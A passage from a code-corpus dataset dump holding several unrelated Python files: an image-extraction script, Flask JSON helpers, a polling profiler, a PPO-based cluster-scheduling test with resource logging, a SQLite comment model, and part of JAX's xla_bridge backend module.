hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56dede1f84776abd68712b1bc66617088bc13c37 | 2,097 | py | Python | images/parse.py | pippinhio/image-recognition | 89569a0d66ae144d2f6e6f2d73a8577ef8b2272b | [
"MIT"
] | 1 | 2022-03-28T08:12:21.000Z | 2022-03-28T08:12:21.000Z | images/parse.py | pippinhio/image-recognition | 89569a0d66ae144d2f6e6f2d73a8577ef8b2272b | [
"MIT"
] | null | null | null | images/parse.py | pippinhio/image-recognition | 89569a0d66ae144d2f6e6f2d73a8577ef8b2272b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Run with e.g. ./parse.py franz
import sys
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import torchvision
import torchvision.transforms as transforms
def prepare_folder(category):
os.system("rm -rf %s" % category)
os.system("mkdir %s" % category)
def create_images_handwriting(category):
big_image = plt.imread('%s.jpg' % category)
nx = 36 #rows
ny = 41 #columns
count = 0
for i in range(nx):
for j in range(ny):
small_image = big_image[32*i:32*(i+1), 32*j:32*(j+1), :]
file_path = '%s/%06d' % (category, count)
plt.imsave(file_path + '.png', small_image)
os.system('convert %s.png %s.jpg' % (file_path, file_path))
os.system('rm %s.png' % file_path)
count += 1
def transform_tensor_to_numpy(image):
image = image / 2 + 0.5
np_image = image.numpy()
return np.transpose(np_image, (1, 2, 0))
def create_images_torchvision(category, idx):
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
images_set = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
images_loader = torch.utils.data.DataLoader(images_set, batch_size=1, shuffle=False, num_workers=2)
count = 0
for data in images_loader:
image, label = data
if label != idx:
continue
file_path = '%s/%06d' % (category, count)
plt.imsave(file_path + '.png', transform_tensor_to_numpy(image[0]))
os.system('convert %s.png %s.jpg' % (file_path, file_path))
os.system('rm %s.png' % file_path)
count += 1
if count == 1476:
break
if __name__ == '__main__':
category = sys.argv[1]
if category in ('franz', 'nina', 'robert_scan', 'franz_scan'):
prepare_folder(category)
create_images_handwriting(category)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
if category in classes:
prepare_folder(category)
create_images_torchvision(category, classes.index(category))
pass
| 28.726027 | 106 | 0.65856 |
601f5518aadb6f8a53de564498a2114336bd08c5 | 357 | py | Python | books/common/response.py | jhgdike/books | dde36f4d419d1b3afb2c87c3509d7672d9c07c75 | [
"MIT"
] | null | null | null | books/common/response.py | jhgdike/books | dde36f4d419d1b3afb2c87c3509d7672d9c07c75 | [
"MIT"
] | 3 | 2022-03-09T03:53:43.000Z | 2022-03-09T03:53:48.000Z | books/common/response.py | jhgdike/books | dde36f4d419d1b3afb2c87c3509d7672d9c07c75 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from flask import jsonify
def json_success(data=''):
resp_json = {
'code': 0,
'data': data,
}
return jsonify(**resp_json)
def json_err(err, msg=''):
resp_json = {
'code': err,
'msg': msg or err.label,
}
return jsonify(**resp_json)
| 16.227273 | 39 | 0.565826 |
700510ac2d47dd8e8e96aa087011e4bba4a2d8d0 | 1,489 | py | Python | forceDAQ/_lib/polling_time_profile.py | raunaqbhirangi/pyForceDAQ | a2a41cd7a4a4f0afd178bc5555ba4e0540902d30 | [
"MIT"
] | 8 | 2016-06-27T12:07:14.000Z | 2022-03-29T08:59:44.000Z | forceDAQ/_lib/polling_time_profile.py | raunaqbhirangi/pyForceDAQ | a2a41cd7a4a4f0afd178bc5555ba4e0540902d30 | [
"MIT"
] | 1 | 2020-01-15T20:29:53.000Z | 2020-07-31T17:35:34.000Z | forceDAQ/_lib/polling_time_profile.py | raunaqbhirangi/pyForceDAQ | a2a41cd7a4a4f0afd178bc5555ba4e0540902d30 | [
"MIT"
] | 3 | 2020-01-14T18:31:39.000Z | 2022-03-25T05:56:40.000Z | from .timer import get_time
import numpy as np
class PollingTimeProfile(object):
def __init__(self, timing_range=10):
self._last = None
self._timing_range = 10
self._zero_cnt = 0
#self._zero_time_polling_frequency = {}
self.profile_frequency = np.array([0] * (timing_range + 1))
def stop(self):
self._last = None
def update(self, time_ms):
if self._last is not None:
d = time_ms - self._last
if d > self._timing_range:
d = self._timing_range
self.profile_frequency[d] += 1
#if d == 0:
# self._zero_cnt += 1
#elif self._zero_cnt > 0:
# try:
# self._zero_time_polling_frequency[self._zero_cnt] += 1
# except:
# self._zero_time_polling_frequency[self._zero_cnt] = 1
# self._zero_cnt = 0
self._last = time_ms
def tick(self):
self.update(int(1000*get_time()))
@property
def profile_percent(self):
n = np.sum(self.profile_frequency)
return self.profile_frequency / n
def get_profile_str(self):
rtn = str(list(self.profile_frequency)
).replace("[", "").replace("]", "").replace(" ", "")
return "polling profile [{}]".format(rtn)
#@property
#def zero_time_polling_frequency(self):
# return np.array(list(self._zero_time_polling_frequency.items())) | 29.78 | 75 | 0.567495 |
6d25e9ed91a52deabecb134a44b6f9eb4aad016a | 10,641 | py | Python | resources_monitor.py | Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning | eb246ebba160567277c9c1aa226e359f48629dac | [
"MIT"
] | 2 | 2022-03-03T08:52:14.000Z | 2022-03-11T02:27:57.000Z | resources_monitor.py | Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning | eb246ebba160567277c9c1aa226e359f48629dac | [
"MIT"
] | 1 | 2022-03-11T02:51:06.000Z | 2022-03-11T05:02:34.000Z | resources_monitor.py | Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning | eb246ebba160567277c9c1aa226e359f48629dac | [
"MIT"
] | null | null | null | import os
from datetime import datetime
import gym
import numpy as np
import torch
import torch.nn as nn
import xlwt
from torch.distributions import Categorical, MultivariateNormal
def initial_excel():
global worksheet, workbook
# xlwt 库将数据导入Excel并设置默认字符编码为ascii
workbook = xlwt.Workbook(encoding='ascii')
# 添加一个表 参数为表名
worksheet = workbook.add_sheet('resources usage')
# 生成单元格样式的方法
# 设置列宽, 3为列的数目, 12为列的宽度, 256为固定值
for i in range(3):
worksheet.col(i).width = 256 * 12
# 设置单元格行高, 25为行高, 20为固定值
worksheet.row(1).height_mismatch = True
worksheet.row(1).height = 20 * 25
worksheet.write(0, 0, 'time')
worksheet.write(0, 1, 'CPU usage(%)')
worksheet.write(0, 2, 'Memory usage(%)')
worksheet.write(0, 3, 'time1')
worksheet.write(0, 4, 'CPU(%)')
worksheet.write(0, 5, 'Memory(%)')
# 保存excel文件
workbook.save('data/res_monitor.xls')
print("============================================================================================")
####### initialize environment hyperparameters ######
env_name = "clusterEnv-v0" # 定义自己的环境名称
max_ep_len = 10000 # max timesteps in one episode
total_test_episodes = 1 # total num of testing episodes
################ PPO hyperparameters ################
K_epochs = 80 # update policy for K epochs in one PPO update
eps_clip = 0.2 # clip parameter for PPO
gamma = 0.99 # discount factor
lr_actor = 0.0003 # learning rate for actor network
lr_critic = 0.001 # learning rate for critic network
#####################################################
print("Testing environment name : " + env_name)
env = gym.make(env_name).unwrapped
# state space dimension # action space dimension
state_dim, action_dim = env.return_dim_info()
################### checkpointing ###################
run_num_pretrained = 'resourceTest' #### change this to prevent overwriting weights in same env_name folder
directory = "runs/PPO_preTrained"
if not os.path.exists(directory):
os.makedirs(directory)
directory = directory + '/' + 'clusterEnv-v0' + '/'
if not os.path.exists(directory):
os.makedirs(directory)
checkpoint_path = directory + "PPO_clusterEnv-v0_{}.pth".format(run_num_pretrained)
print("save checkpoint path : " + checkpoint_path)
#####################################################
############# print all hyperparameters #############
print("--------------------------------------------------------------------------------------------")
print("资源用量监视")
print("--------------------------------------------------------------------------------------------")
print("状态空间维数 : ", state_dim)
print("动作空间维数 : ", action_dim)
################################## set device ##################################
print("============================================================================================")
# set device to cpu or cuda
device = torch.device('cpu')
if (torch.cuda.is_available()):
device = torch.device('cuda:0')
torch.cuda.empty_cache()
print("Device set to : " + str(torch.cuda.get_device_name(device)))
else:
print("Device set to : cpu")
print("============================================================================================")
line = 1
flag = 0
################################## PPO Policy ##################################
class RolloutBuffer:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim):
super(ActorCritic, self).__init__()
self.actor = nn.Sequential(
nn.Linear(state_dim, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, action_dim),
nn.Softmax(dim=-1)
)
# critic
self.critic = nn.Sequential(
nn.Linear(state_dim, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, 1)
)
def forward(self):
raise NotImplementedError
def act(self, state):
# global flag,line
probability = {}
action_probs = self.actor(state)
dist = Categorical(action_probs)
for j in range(action_dim):
probability[j] = dist.probs.detach()[j] # 记录当前动作概率分布
action = dist.sample()
state, reward, done, info = env.step(action.item() - 1)
while (info[0] == False): # 重采样
probability[action.item()] = 0
probability_list = [probs for probs in probability.values()]
probs = torch.FloatTensor(probability_list)
dist_copy = Categorical(probs)
for j in range(len(dist_copy.probs)):
probability_list[j] = dist_copy.probs[j].item()
probs = torch.FloatTensor(probability_list)
dist_1 = Categorical(probs)
action = dist_1.sample().to(device) # 采样当前动作
# if action.item() == 0:
# time, cpu_usage, memory_usage = env.return_res_usage()
# worksheet.write(line, 1, str(100-cpu_usage)+'%')
# worksheet.write(line, 2, str(100-memory_usage)+'%')
# flag = 1
# line += 1
state, reward, done, info = env.step(action.item() - 1) # 输入step的都是
action_logprob = dist.log_prob(action).unsqueeze(0)
return action.detach(), action_logprob.detach(), state, reward, done, info
def evaluate(self, state, action):
action_probs = self.actor(state)
dist = Categorical(action_probs)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_values = self.critic(state)
return action_logprobs, state_values, dist_entropy
class PPO:
def __init__(self, state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip):
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.buffer = RolloutBuffer() # 经验池
self.policy = ActorCritic(state_dim, action_dim).to(device) # AC策略
self.optimizer = torch.optim.Adam([
{'params': self.policy.actor.parameters(), 'lr': lr_actor},
{'params': self.policy.critic.parameters(), 'lr': lr_critic}
])
self.policy_old = ActorCritic(state_dim, action_dim).to(device) # AC策略old网络
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def select_action(self, state):
with torch.no_grad():
state = torch.FloatTensor(state).to(device)
self.buffer.states.append(state)
action, action_logprob, state, reward, done, info = self.policy_old.act(state)
self.buffer.actions.append(action) # 保存动作
self.buffer.logprobs.append(action_logprob) # 保存动作概率
return state, reward, done, info
def update(self):
# Monte Carlo estimate of returns
rewards = []
discounted_reward = 0
for reward, is_terminal in zip(reversed(self.buffer.rewards), reversed(self.buffer.is_terminals)):
if is_terminal:
discounted_reward = 0
discounted_reward = reward + (self.gamma * discounted_reward)
rewards.insert(0, discounted_reward)
# Normalizing the rewards
rewards = torch.tensor(rewards, dtype=torch.float32).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-7)
# convert list to tensor
old_states = torch.squeeze(torch.stack(self.buffer.states, dim=0)).detach().to(device)
old_actions = torch.squeeze(torch.stack(self.buffer.actions, dim=0)).detach().to(device)
old_logprobs = torch.squeeze(torch.stack(self.buffer.logprobs, dim=0)).detach().to(device)
# Optimize policy for K epochs
for _ in range(self.K_epochs):
# Evaluating old actions and values
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions)
# match state_values tensor dimensions with rewards tensor
state_values = torch.squeeze(state_values)
# Finding the ratio (pi_theta / pi_theta__old)
ratios = torch.exp(logprobs - old_logprobs.detach())
# Finding Surrogate Loss
advantages = rewards - state_values.detach()
surr1 = ratios * advantages
surr2 = torch.clamp(ratios, 1 - self.eps_clip, 1 + self.eps_clip) * advantages
# final loss of clipped objective PPO
loss = -torch.min(surr1, surr2) + 0.5 * self.MseLoss(state_values, rewards) - 0.01 * dist_entropy
# take gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
# Copy new weights into old policy
self.policy_old.load_state_dict(self.policy.state_dict())
# clear buffer
self.buffer.clear()
def save(self, checkpoint_path):
torch.save(self.policy_old.state_dict(), checkpoint_path)
def load(self, checkpoint_path):
self.policy_old.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))
self.policy.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))
def test():
################# testing procedure ################
# initialize a PPO agent
global flag
ppo_agent = PPO(state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip)
# track total testing time
ppo_agent.load(checkpoint_path)
print("Network ID:", run_num_pretrained)
print('PPO agent has been loaded!')
# GCN test
state = env.reset()
for t in range(1, max_ep_len + 1):
# select action with policy
new_state, reward, done, info = ppo_agent.select_action(state)
# saving reward and is_terminals
# break; if the episode is over
if flag == 1:
time, cpu_usage, memory_usage = env.return_res_usage()
worksheet.write(line - 1, 0, time)
flag = 0
# 记录资源使用率
state = new_state
if done:
print("makesspan:", state[0])
break
ppo_agent.buffer.clear()
# workbook.save('data/res_monitor.xls')
env.close()
if __name__ == '__main__':
# initial_excel()
test()
| 34.436893 | 111 | 0.578235 |
8848857d911b4ab28453bc818aa1aab3174f531c | 2,317 | py | Python | backend/Models/Comment.py | HallWoodZhang/NEUTV_UWP | 6509c79b17c881ecc1247a18f93b256f70b5d077 | [
"MIT"
] | 1 | 2019-03-18T15:37:44.000Z | 2019-03-18T15:37:44.000Z | backend/Models/Comment.py | HallWoodZhang/NEUTV_UWP | 6509c79b17c881ecc1247a18f93b256f70b5d077 | [
"MIT"
] | 3 | 2018-04-16T01:33:30.000Z | 2018-05-04T01:52:00.000Z | backend/Models/Comment.py | HallWoodZhang/NEUTV_UWP | 6509c79b17c881ecc1247a18f93b256f70b5d077 | [
"MIT"
] | 3 | 2018-04-10T09:39:40.000Z | 2018-05-05T02:30:21.000Z | # encoding: utf-8
from __future__ import unicode_literals
import sqlite3
import web
from .Model import Model
class Comment(Model):
def __init__(self, channel_id = u'default', content = u'default', date = u'1111-11-11 00:00:00'):
self.channel_id = channel_id
self.content = content
self.date = date
def insert(self, conn):
try:
conn.execute(
"insert into comment(channel_id, content, date) values(?, ?, ?)",
(self.channel_id, self.content, self.date)
)
conn.commit()
return True
except Exception as e:
print(e)
print('insert comment failed %s, %s, %s', self.channel_id, self.content, self.date)
return False
# static function
def query_by_period(conn, beg, end, channel_id):
'''
insert the object itself to the database by connection
'''
cache = []
curr = conn.cursor()
sql = 'select channel_id, content, date from comment' +\
' where datetime(date)>=datetime(?) and datetime(?)>=datetime(date) and channel_id=?'
try:
for tmp in curr.execute(sql, (beg, end, channel_id)).fetchall():
cache.append(create_comment_from_tuple(tmp))
except Exception as e:
print(e)
raise AttributeError
finally:
curr.close()
return cache
# static function
def query_by_period_tuples(conn, beg, end, channel_id):
'''
the static method return a list of tuples instead of objects
tuples: (channel_id, content, date)
'''
sql = 'select channel_id, content, date from comment' +\
' where datetime(date)>=datetime(?) and datetime(?)>=datetime(date) and channel_id=?'
try:
return conn.execute(sql, (beg, end, channel_id)).fetchall()
except Exception as e:
print(e)
raise AttributeError
return None
def __str__(self):
return self.content
def create_comment_from_args(
channel_id = u'default', content = u'default', date = u'1111-11-11 00:00:00'
):
return Comment(channel_id, content, date)
def create_comment_from_tuple(tp):
return Comment(tp[0], tp[1], tp[2])
| 31.310811 | 101 | 0.587829 |
1a4f232eaa685ad4b14da1056abfb7951f97d169 | 19,098 | py | Python | jax/_src/lib/xla_bridge.py | mkovaxx/jax | 7ce55684356253859928728c82916ac373e283f9 | [
"Apache-2.0"
] | 1 | 2020-01-13T18:55:49.000Z | 2020-01-13T18:55:49.000Z | jax/_src/lib/xla_bridge.py | mkovaxx/jax | 7ce55684356253859928728c82916ac373e283f9 | [
"Apache-2.0"
] | 6 | 2021-11-25T07:58:40.000Z | 2022-01-31T21:15:49.000Z | jax/_src/lib/xla_bridge.py | abattery/jax | 62c7744e68c66fae9faf9d8d00fea8aad4418cf3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface and utility functions to XLA.
This module wraps the XLA client(s) and builders to standardize their interfaces
and provide some automatic type mapping logic for converting between Numpy and
XLA. There are also a handful of related casting utilities.
"""
from functools import partial, lru_cache
import os
import threading
from typing import Any, Dict, List, Optional, Tuple, Union
import warnings
from absl import logging
# Disable "WARNING: Logging before flag parsing goes to stderr." message
logging._warn_preinit_stderr = 0
import jax._src.lib
from jax._src.config import flags, bool_env
from . import tpu_driver_client
from . import xla_client
from jax._src import util, traceback_util
import numpy as np
iree: Optional[Any]
try:
import jax._src.iree as iree # type: ignore
except ModuleNotFoundError:
iree = None
traceback_util.register_exclusion(__file__)
xops = xla_client.ops
FLAGS = flags.FLAGS
# TODO(phawkins): Remove jax_xla_backend.
flags.DEFINE_string(
'jax_xla_backend', '',
'Deprecated, please use --jax_platforms instead.')
flags.DEFINE_string(
'jax_backend_target', '',
'Either "local" or "rpc:address" to connect to a remote service target.')
# TODO(skye): warn when this is used once we test out --jax_platforms a bit
flags.DEFINE_string(
'jax_platform_name',
os.getenv('JAX_PLATFORM_NAME', '').lower(),
'Deprecated, please use --jax_platforms instead.')
flags.DEFINE_string(
'jax_platforms',
os.getenv('JAX_PLATFORMS', '').lower(),
'Comma-separated list of platform names specifying which platforms jax '
'should attempt to initialize. The first platform in the list that is '
'successfully initialized will be used as the default platform. For '
'example, --jax_platforms=cpu,gpu means that CPU and GPU backends will be '
'initialized, and the CPU backend will be used unless otherwise specified; '
'--jax_platforms=cpu means that only the CPU backend will be initialized. '
'By default, jax will try to initialize all available platforms and will '
'default to GPU or TPU if available, and fallback to CPU otherwise.')
flags.DEFINE_bool(
'jax_disable_most_optimizations',
bool_env('JAX_DISABLE_MOST_OPTIMIZATIONS', False),
'Try not to do much optimization work. This can be useful if the cost of '
'optimization is greater than that of running a less-optimized program.')
def get_compile_options(
num_replicas: int,
num_partitions: int,
device_assignment=None,
use_spmd_partitioning: bool = True,
) -> xla_client.CompileOptions:
"""Returns the compile options to use, as derived from flag values.
Args:
num_replicas: Number of replicas for which to compile.
num_partitions: Number of partitions for which to compile.
device_assignment: Optional tuple of integers indicating the assignment of
logical replicas to physical devices (default inherited from
xla_client.CompileOptions). Must be consistent with `num_replicas` and
`num_partitions`.
use_spmd_partitioning: boolean indicating whether to enable SPMD or MPMD
partitioning in XLA.
"""
compile_options = xla_client.CompileOptions()
compile_options.num_replicas = num_replicas
compile_options.num_partitions = num_partitions
build_options = compile_options.executable_build_options
build_options.use_spmd_partitioning = use_spmd_partitioning
if device_assignment is not None:
logging.vlog(
2,
'get_compile_options: num_replicas=%s num_partitions=%s device_assignment=%s',
num_replicas, num_partitions, device_assignment)
device_assignment = np.array(device_assignment)
# Allow 1D device assignment if num_partitions is 1.
if (device_assignment.ndim == 1) and (num_partitions == 1):
device_assignment = device_assignment[:, None]
if num_replicas != device_assignment.shape[0]:
msg = 'device_assignment does not match num_replicas: {} vs {}.'
raise ValueError(msg.format(device_assignment, num_replicas))
if num_partitions != device_assignment.shape[1]:
msg = 'device_assignment does not match num_partitions: {} vs {}.'
raise ValueError(msg.format(device_assignment, num_partitions))
device_assignment = xla_client.DeviceAssignment.create(device_assignment)
assert device_assignment.replica_count() == num_replicas
assert device_assignment.computation_count() == num_partitions
compile_options.device_assignment = device_assignment
debug_options = compile_options.executable_build_options.debug_options
if jax._src.lib.cuda_path is not None:
debug_options.xla_gpu_cuda_data_dir = jax._src.lib.cuda_path
if FLAGS.jax_disable_most_optimizations:
debug_options.xla_backend_optimization_level = 0
debug_options.xla_llvm_disable_expensive_passes = True
debug_options.xla_test_all_input_layouts = False
return compile_options
# Backends
def _make_tpu_driver_client():
if tpu_driver_client is None:
logging.info("Remote TPU is not linked into jax; skipping remote TPU.")
return None
if FLAGS.jax_backend_target is None:
logging.info("No --jax_backend_target was provided; skipping remote TPU.")
return None
return tpu_driver_client.TpuBackend.create(worker=FLAGS.jax_backend_target)
def tpu_client_timer_callback(timer_secs: float):
def _log_warning():
warnings.warn(
f'TPU backend initialization is taking more than {timer_secs} seconds. '
'Did you run your code on all TPU hosts? '
'See https://jax.readthedocs.io/en/latest/multi_process.html '
'for more information.')
# Will log a warning after `timer_secs`.
t = threading.Timer(timer_secs, _log_warning)
t.start()
try:
client = xla_client.make_tpu_client()
finally:
t.cancel()
return client
# Backends, in increasing order of preference.
# We have no particular opinion about how "backends" relate to "devices". For
# example, there could be multiple backends that provide the same kind of
# device.
_backend_factories = {}
_default_backend = None
_backends : Dict[str, Any] = {}
_backends_errors : Dict[str, str] = {}
_backend_lock = threading.Lock()
def register_backend_factory(name, factory, *, priority=0):
with _backend_lock:
if name in _backends:
raise RuntimeError(f"Backend {name} already initialized")
_backend_factories[name] = (factory, priority)
register_backend_factory('interpreter', xla_client.make_interpreter_client,
priority=-100)
register_backend_factory('cpu',
partial(xla_client.make_cpu_client, use_tfrt=True),
priority=0)
register_backend_factory('tpu_driver', _make_tpu_driver_client,
priority=100)
register_backend_factory('gpu', xla_client.make_gpu_client,
priority=200)
register_backend_factory(
'tpu', partial(tpu_client_timer_callback, timer_secs=60.0), priority=300)
if iree is not None:
register_backend_factory("iree", iree.iree_client_factory, priority=-100)
def backends():
global _backends
global _backends_errors
global _default_backend
with _backend_lock:
if _backends:
return _backends
if FLAGS.jax_platforms:
platforms = FLAGS.jax_platforms.split(",")
priorities = range(len(platforms), 0, -1)
platforms_and_priorites = zip(platforms, priorities)
else:
platforms_and_priorites = (
(platform, priority) for platform, (_, priority)
in _backend_factories.items())
default_priority = -1000
for platform, priority in platforms_and_priorites:
try:
backend = _init_backend(platform)
_backends[platform] = backend
if priority > default_priority:
_default_backend = backend
default_priority = priority
except Exception as err:
if platform in ('cpu', 'interpreter'):
# We always expect the CPU and interpreter backends to initialize
# successfully.
raise
else:
# If the backend isn't built into the binary, or if it has no devices,
# we expect a RuntimeError.
logging.info("Unable to initialize backend '%s': %s", platform,
err)
_backends_errors[platform] = str(err)
continue
if _default_backend.platform == "cpu" and FLAGS.jax_platform_name != 'cpu':
logging.warning('No GPU/TPU found, falling back to CPU. '
'(Set TF_CPP_MIN_LOG_LEVEL=0 and rerun for more info.)')
return _backends
def _init_backend(platform):
factory, unused_priority = _backend_factories.get(platform, (None, None))
if factory is None:
raise RuntimeError(f"Unknown backend '{platform}'")
logging.vlog(1, "Initializing backend '%s'" % platform)
backend = factory()
# TODO(skye): consider raising more descriptive errors directly from backend
# factories instead of returning None.
if backend is None:
raise RuntimeError(f"Could not initialize backend '{platform}'")
if backend.device_count() == 0:
raise RuntimeError(f"Backend '{platform}' provides no devices.")
util.distributed_debug_log(("Initialized backend", backend.platform),
("process_index", backend.process_index()),
("device_count", backend.device_count()),
("local_devices", backend.local_devices()))
logging.vlog(1, "Backend '%s' initialized" % platform)
return backend
def _get_backend_uncached(platform=None):
# TODO(mattjj,skyewm): remove this input polymorphism after we clean up how
# 'backend' values are handled
if not isinstance(platform, (type(None), str)):
return platform
bs = backends()
platform = (platform or FLAGS.jax_xla_backend or FLAGS.jax_platform_name
or None)
if platform is not None:
backend = bs.get(platform, None)
if backend is None:
if platform in _backends_errors:
raise RuntimeError(f"Backend '{platform}' failed to initialize: "
f"{_backends_errors[platform]}")
raise RuntimeError(f"Unknown backend {platform}")
return backend
else:
return _default_backend
@lru_cache(maxsize=None) # don't use util.memoize because there is no X64 dependence.
def get_backend(platform=None):
return _get_backend_uncached(platform)
def get_device_backend(device=None):
"""Returns the Backend associated with `device`, or the default Backend."""
if device is not None:
return device.client
return get_backend()
def device_count(backend: Optional[str] = None) -> int:
"""Returns the total number of devices.
On most platforms, this is the same as :py:func:`jax.local_device_count`.
However, on multi-process platforms where different devices are associated
with different processes, this will return the total number of devices across
all processes.
Args:
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
Number of devices.
"""
return int(get_backend(backend).device_count())
def local_device_count(backend: Optional[str] = None) -> int:
"""Returns the number of devices addressable by this process."""
return int(get_backend(backend).local_device_count())
def devices(backend: Optional[str] = None) -> List[xla_client.Device]:
"""Returns a list of all devices for a given backend.
.. currentmodule:: jaxlib.xla_extension
Each device is represented by a subclass of :class:`Device` (e.g.
:class:`CpuDevice`, :class:`GpuDevice`). The length of the returned list is
equal to ``device_count(backend)``. Local devices can be identified by
comparing :attr:`Device.process_index` to the value returned by
:py:func:`jax.process_index`.
If ``backend`` is ``None``, returns all the devices from the default backend.
The default backend is generally ``'gpu'`` or ``'tpu'`` if available,
otherwise ``'cpu'``.
Args:
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
List of Device subclasses.
"""
return get_backend(backend).devices()
def default_backend() -> str:
"""Returns the platform name of the default XLA backend."""
return get_backend(None).platform
def local_devices(process_index: Optional[int] = None,
backend: Optional[str] = None,
host_id: Optional[int] = None) -> List[xla_client.Device]:
"""Like :py:func:`jax.devices`, but only returns devices local to a given process.
If ``process_index`` is ``None``, returns devices local to this process.
Args:
process_index: the integer index of the process. Process indices can be
retrieved via ``len(jax.process_count())``.
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
List of Device subclasses.
"""
if host_id is not None:
warnings.warn(
"The argument to jax.local_devices has been renamed from `host_id` to "
"`process_index`. This alias will eventually be removed; please update "
"your code.")
process_index = host_id
if process_index is None:
process_index = get_backend(backend).process_index()
if not (0 <= process_index < process_count()):
raise ValueError(f"Unknown process_index {process_index}")
return [d for d in devices(backend) if d.process_index == process_index]
def process_index(backend: Optional[str] = None) -> int:
"""Returns the integer process index of this process.
On most platforms, this will always be 0. This will vary on multi-process
platforms though.
Args:
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
Integer process index.
"""
return get_backend(backend).process_index()
# TODO: remove this sometime after jax 0.2.13 is released
def host_id(backend=None):
warnings.warn(
"jax.host_id has been renamed to jax.process_index. This alias "
"will eventually be removed; please update your code.")
return process_index(backend)
def process_count(backend: Optional[str] = None) -> int:
"""Returns the number of JAX processes associated with the backend."""
return max(d.process_index for d in devices(backend)) + 1
# TODO: remove this sometime after jax 0.2.13 is released
def host_count(backend=None):
warnings.warn(
"jax.host_count has been renamed to jax.process_count. This alias "
"will eventually be removed; please update your code.")
return process_count(backend)
# TODO: remove this sometime after jax 0.2.13 is released
def host_ids(backend=None):
warnings.warn(
"jax.host_ids has been deprecated; please use range(jax.process_count()) "
"instead. jax.host_ids will eventually be removed; please update your "
"code.")
return list(range(process_count(backend)))
### utility functions
def parameter(builder, num, shape, name=None, replicated=None):
if name is None:
name = ''
if replicated is None:
replicated = []
elif isinstance(replicated, bool):
replicated = [replicated] * shape.leaf_count()
return xops.Parameter(builder, num,
shape.with_major_to_minor_layout_if_absent(), name,
replicated)
# HLO instructions optionally can be annotated to say how the output should be
# spatially partitioned (represented in XLA as OpSharding protos, see
# _sharding_to_proto). For array outputs, the annotation is either an int per
# dimension specifying the number of ways that dimension divided (i.e. the total
# number of shards is the product), or None to indicate the array should be
# replicated. Tuple outputs are represented as tuples thereof. XLA supports
# arbitrary tuple nesting, but JAX only uses one level of tupling (and our type
# checkers don't support recursive types), so we only represent one level of
# nesting in this type definition.
SpatialSharding = Union[Tuple[int, ...],
None,
Tuple[Union[Tuple[int, ...], None], ...]]
def _sharding_to_proto(sharding: SpatialSharding):
"""Converts a SpatialSharding to an OpSharding.
